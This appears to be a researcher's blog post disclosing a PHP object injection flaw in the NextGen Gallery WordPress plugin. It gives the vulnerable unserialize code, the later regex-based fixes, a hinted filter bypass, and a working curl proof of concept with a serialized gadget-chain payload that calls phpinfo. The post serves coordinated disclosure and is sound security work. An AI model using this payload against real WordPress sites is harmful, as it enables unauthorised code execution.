slavco
slavco
Feb 4 · 3 min read

Everyone who had ever faced image archiving and presentation in WordPress knows about NextGen Gallery plugin. It is most popular plugin for any image related WP use case. With its ~1 million active instalations, gets security people attention. Month ago I decided to report vulnerability towards them.

Grabbed from here

Disclosure process

I decided to report the weakness in the plugin code and started to search for a contact or something. Nothing public, nothing easy to be found. I decided to go via plugins[at]wp[dot]org and it worked. I had shared my concerns with plugins people and developers were reached. Quite fast “fixed” version was released. This release was done without any check with me and I wrote towards plugins people again. This time they pushed developers to reach me and it happened. They provided the fix (current 3.1.6 version) and I gave my opinions about it, but also I requested for permission to write about it in 2–3 weeks after release.
Now after 3 weeks, when most of the instances in the wild are updated (free and premium) developer (NextGen folks) agree that I’m free to write about vulnerability.

Vulnerability in NextGen 3.1.4

I had wrote many times in the past that when using WP you should NOT: use another unserialize approach than given maybe_ functions, to use it only once and that shouldn’t be on raw input or input changed somehow by another routines in the storage!

static function unserialize($value)
...
if (strpos($retval, 'a:') === 0)
{
$er = error_reporting(0);
$retval = unserialize($value);
error_reporting($er);
}
else {
...
return $retval;
}

Attack PoC

Beside the option to perform this type of attack via meta table in WP, plugin was vulnerable towards direct unserialize of user input (in its clients libraries there are many serialize calls :) ). So, with low priviledged user (the one who can manage / create albums) the following attack is/was in game:

curl 'http://local.target/wp-admin/admin.php?page=nggallery-manage-album&act_album=1' --data '_wpnonce=0576380f03&_wp_http_referer=%2Fwpm%2Fwp5rc%2Fwp-admin%2Fadmin.php%3Fpage%3Dnggallery-manage-album%26act_album%3D1&sortorder=gid%3Da:1:{i:0;O:15:"simple_html_dom":1:{s:5:"nodes";C:33:"Requests_Utility_FilteredIterator":100:{x:i:0;a:3:{i:0;i:1;i:1;i:1;i:2;i:1;};m:a:1:{S:11:"\00\2A\00\63\61\6C\6C\62\61\63\6B";s:7:"phpinfo";}}}}&act_album=1&update=Update' --compressed

Vulnerability fix in NextGen 3.1.5

Fix was introduced in the following way:

if (self::check_for_serialized_objects($value))
throw new Exception(__("NextGen Gallery will not unserialize data with objects", 'nextgen_gallery'));

and in this method we have the following:

public static function check_for_serialized_objects($string)
{
if (!is_string($string))
return false;
$string = trim($string);
return (bool)preg_match("/O:[0-9]+:/is", $string);
}

but is it fixed? Check this + method bypass here :)

Vulnerability fix in NextGen 3.1.6

public static function check_for_serialized_objects($string)
{
if (!is_string($string))
return false;
$string = trim($string);
return (bool)preg_match("/(O|C):\+?[0-9]+:/is", $string);
}

This way, somehow we are assured that fix is almost complete in latest PHP 7.2+ versions only, the rest of the versions are vulnerable at least from DOS via this routine and we already saw how interesting that could be for WordPress.

Promo

If you are wp developer or wp host provider or wp security product provider with valuable list of clients, we offer subscription list and we are exceptional (B2B only).

websec

Attack sources + web application security

slavco

Written by

slavco

websec

websec

Attack sources + web application security

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade